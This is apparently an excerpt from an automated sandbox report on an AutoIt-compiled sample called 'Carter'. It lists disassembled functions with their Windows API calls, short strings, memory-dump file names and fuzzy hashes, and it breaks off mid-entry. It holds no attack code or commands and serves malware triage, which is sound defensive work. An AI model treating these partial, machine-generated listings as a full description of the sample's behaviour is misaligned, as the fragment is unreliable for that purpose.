                                                                            Function 0027E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0027E01E
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0027E037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: f429446c55e25e3ed53d370edd3842a7447fca726841d7e8b008a23e9e9e316e
                                                                            • Instruction ID: d7b3499a63446c92450b68fddbde89671442905cc63820b6cd20dc6499bfa6cd
                                                                            • Opcode Fuzzy Hash: f429446c55e25e3ed53d370edd3842a7447fca726841d7e8b008a23e9e9e316e
                                                                            • Instruction Fuzzy Hash: 8D512672418744DBE321AF50EC86BABBBE8FB84714F51885DF2D8411A1DB7095398B26
                                                                            Function 002F8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002F8186
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F819B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 2e7413c8057a66a5a38c29371a6fdeeed84584ae6f50bb9e692cb52deda0d022
                                                                            • Instruction ID: 16f6d3a087c1efa3de168d1eda6c64a7017a060a4c7decaf86e05fc6e289ebd1
                                                                            • Opcode Fuzzy Hash: 2e7413c8057a66a5a38c29371a6fdeeed84584ae6f50bb9e692cb52deda0d022
                                                                            • Instruction Fuzzy Hash: 15410C74A1120D9FDB14CF64C881BEABBB9FB08340F50017AEA08EB351DB71A955CF90
                                                                            Function 002E2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002E2C6A
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002E2CA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            • Opcode ID: 82ba33a0ec5c29612f53d8ad465789eb628af8739f9bace6f5606fbc8e6674bd
                                                                            • Instruction ID: bc18fa0a805a356f37e1ac8e1d2314ab8e77f77dbe12663bda0b3c3105b722c1
                                                                            • Opcode Fuzzy Hash: 82ba33a0ec5c29612f53d8ad465789eb628af8739f9bace6f5606fbc8e6674bd
                                                                            • Instruction Fuzzy Hash: 8F31F775821119EBCF11EFA1CC85AEEBBB9FF04310F100059E915A61A2EB715966DFA0
                                                                            Function 002F7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 002F713C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002F7178
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 93f4a911bb1e75a87d7419e7e45d2a786e6ef38ed91cdb6cf7c045983cc5a2ba
                                                                            • Instruction ID: c3d9e8c5c14c8932e0d8dcad6df27f04e885f4d74835bfaa9eb522efbff187f9
                                                                            • Opcode Fuzzy Hash: 93f4a911bb1e75a87d7419e7e45d2a786e6ef38ed91cdb6cf7c045983cc5a2ba
                                                                            • Instruction Fuzzy Hash: 0431A171110608AEDB119F74CC80BFBB3A9FF48760F109629FA9987191DB31ACA5CB60
                                                                            Function 002D3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D30B8
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D30F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: ff0f9ba1d9dc4314913ab0d08f3d386dc8ef08d3d9950d91498794bf96ec013a
                                                                            • Instruction ID: 38032593067b35715f1f8ca90c1a9c6477ebbf11d48ecbb9b19434d0d6b5ebee
                                                                            • Opcode Fuzzy Hash: ff0f9ba1d9dc4314913ab0d08f3d386dc8ef08d3d9950d91498794bf96ec013a
                                                                            • Instruction Fuzzy Hash: FB31D73161020B9BEB25DF54C885BAEBBB8FF05350F14401AE889A6391D7B0DF64CB52
                                                                            Function 002E40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 002E4132
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: 128e705f2a0d33b8e257b35a44d4f0440221bd1df565ea6001f90fc23860a2e4
                                                                            • Instruction ID: 1ac8ec6ce347ce6577e9ff5b7aafddec3b111dfb9b3e9a02ee4ca9db39b3879e
                                                                            • Opcode Fuzzy Hash: 128e705f2a0d33b8e257b35a44d4f0440221bd1df565ea6001f90fc23860a2e4
                                                                            • Instruction Fuzzy Hash: 2521E334A60219AFCF00FF64D895EEE77B9AF04300F400459F908AB181DB70AA61DFA2
                                                                            Function 002F6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002F6D86
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002F6D91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 11587fb46f3e01f90777fa0bd6f6fc6957380d95907ab7e23e3dbd5eb5345d58
                                                                            • Instruction ID: ab2d97300a5963e5cff3cbdaecbbd337e46ae94507cb7b515ceb2e7ce56a49ed
                                                                            • Opcode Fuzzy Hash: 11587fb46f3e01f90777fa0bd6f6fc6957380d95907ab7e23e3dbd5eb5345d58
                                                                            • Instruction Fuzzy Hash: 5411907132020DAFEF258E54DC85EBB7B6AEB843A4F114135FA189B291D6719C608B60
                                                                            Function 002F722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00272111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
                                                                              • Part of subcall function 00272111: GetStockObject.GDI32(00000011), ref: 00272163
                                                                              • Part of subcall function 00272111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002F7296
                                                                            • GetSysColor.USER32(00000012), ref: 002F72B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 88c7226e259fbbf135ddc958a6be6cb710d0290bc039ebfdea9deb52a0b1d9e9
                                                                            • Instruction ID: add7fdfaa113bbb4c9cd0e8370e24c321c77da759b883baee54852c1303f18e0
                                                                            • Opcode Fuzzy Hash: 88c7226e259fbbf135ddc958a6be6cb710d0290bc039ebfdea9deb52a0b1d9e9
                                                                            • Instruction Fuzzy Hash: 2821177262420AAFDB05DFB8CC45EFABBA8EB08354F004529FE55D3251D735A8619B50
                                                                            Function 002D3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D31C9
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002D31E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: c4873bf4553ff37a2d165ef091d13db108ff091a099a1f5c2ad064ef0e332c17
                                                                            • Instruction ID: d0db7570bad796d3c29960f78fcb7db3251986e8d0ec5ea553b22af0440c3447
                                                                            • Opcode Fuzzy Hash: c4873bf4553ff37a2d165ef091d13db108ff091a099a1f5c2ad064ef0e332c17
                                                                            • Instruction Fuzzy Hash: 7611347292411BABDB21DF98DC45B9D73B8AB46300F140123E809E73A0D770EF29CB92
                                                                            Function 002734E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 0027351D
                                                                            • DestroyWindow.USER32(?,?,00284E61), ref: 00273576
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObjectWindow
                                                                            • String ID: h0
                                                                            • API String ID: 2587070983-1319028847
                                                                            • Opcode ID: ff83ccc9a4b8aa74b45a9376b814383d8aba8f665014c2fdb35b87588ded6b94
                                                                            • Instruction ID: 1fcddcccf1cebf1de8d2219d6bb5b1064328f7a52e5c1ea3123fc8036ab87706
                                                                            • Opcode Fuzzy Hash: ff83ccc9a4b8aa74b45a9376b814383d8aba8f665014c2fdb35b87588ded6b94
                                                                            • Instruction Fuzzy Hash: 022112B47292118FDB3ADF18D899B2533E9AB48711F448159E80E8B2A0CB71DE60EF41
                                                                            Function 002E28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002E28F8
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002E2921
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: 4159ffc981524eca635bb3a596de7a16d6b3be87122751535967bbfc8c9aa716
                                                                            • Instruction ID: d326671efb08ace2cec0bd81cea2236c71926a7d3b065651df4980b1b70617c5
                                                                            • Opcode Fuzzy Hash: 4159ffc981524eca635bb3a596de7a16d6b3be87122751535967bbfc8c9aa716
                                                                            • Instruction Fuzzy Hash: A511E370591266FAEB29CF528C89EF7FB6CFF05750F50412AF54A42100E7B06868D6F0
                                                                            Function 002DD116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp
                                                                            • String ID: 0.0.0.0$L,0
                                                                            • API String ID: 856254489-2909280120
                                                                            • Opcode ID: 924cc361cf11d10a6fdbb4ef42d3ca8c0d5d2f2cc5aec9a64eacd16f52cb1bbc
                                                                            • Instruction ID: b3f5ec5d2386a8394b78504697bf486dd8668dedb73e8d3689adcc78a1e12fb0
                                                                            • Opcode Fuzzy Hash: 924cc361cf11d10a6fdbb4ef42d3ca8c0d5d2f2cc5aec9a64eacd16f52cb1bbc
                                                                            • Instruction Fuzzy Hash: 9D11C135220604DFCB14EE14C881EAAB3B8EF85710F10C04AF90DAF3A1CA70ED56CB61
                                                                            Function 002E8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002E86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002E849D,?,00000000,?,?), ref: 002E86F7
                                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002E84A0
                                                                            • htons.WSOCK32(00000000,?,00000000), ref: 002E84DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 2496851823-2422070025
                                                                            • Opcode ID: d8197cca64fd9e395ce75d7365676981bf1f7411196db07f3c3660015d3c31a9
                                                                            • Instruction ID: 8ae4b418da9d284a71b6a77b87b21859d5cda95c13b46c24077cfc91f9affe74
                                                                            • Opcode Fuzzy Hash: d8197cca64fd9e395ce75d7365676981bf1f7411196db07f3c3660015d3c31a9
                                                                            • Instruction Fuzzy Hash: 5C11E53515024AABDB10AF64DC42FEEB328FF04310F10451BFA19572C1DB71A820CB55
                                                                            Function 002C99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002C9A2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 6b4ed47f2a69b53651c83e4bc6c256f3e6abc27d9d8d7df44de21fbd03a5a674
                                                                            • Instruction ID: 3313b1000528137d8da30d1d91a98c93e6542695ee52a29a76e1f3deda32bff1
                                                                            • Opcode Fuzzy Hash: 6b4ed47f2a69b53651c83e4bc6c256f3e6abc27d9d8d7df44de21fbd03a5a674
                                                                            • Instruction Fuzzy Hash: 0001D275A62124AB8B14FBA4CC56EFEB36DAF56320B100709F861532C1DA315828CB50
                                                                            Function 0027BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0027BC07
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • _wcscat.LIBCMT ref: 002B3593
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FullNamePath_memmove_wcscat
                                                                            • String ID: s3
                                                                            • API String ID: 257928180-1609818047
                                                                            • Opcode ID: 3914b1ae4f86eaad34da690dbebe7c76221fdf4b5d1d1b0babe32432ce1b885b
                                                                            • Instruction ID: df528243a7c3a023aa4b53185006200e6e1f8f739f4c0a7b36504e5d40922176
                                                                            • Opcode Fuzzy Hash: 3914b1ae4f86eaad34da690dbebe7c76221fdf4b5d1d1b0babe32432ce1b885b
                                                                            • Instruction Fuzzy Hash: E311A9399252099BCB17FBB49842EDD77ACFF08350F1080AAB949D7190DF709BA45F51
                                                                            Function 002D934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            • Opcode ID: e3cd8af75f852a047ef7137d9737b1ef048ec2c50558b6833877ed5995f194fd
                                                                            • Instruction ID: 991986468f2e2f96f5e1ff6aa4d4db7854731ce6090e4ca069847fb0931ec5a9
                                                                            • Opcode Fuzzy Hash: e3cd8af75f852a047ef7137d9737b1ef048ec2c50558b6833877ed5995f194fd
                                                                            • Instruction Fuzzy Hash: A80149729142287EDF18CBA8CC46EFEBBF89F01300F00429FF552D2281E5B5A6148B60
                                                                            Function 002C98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 002C9923
                                                                            Strings
                                                                            Memory Dump Source
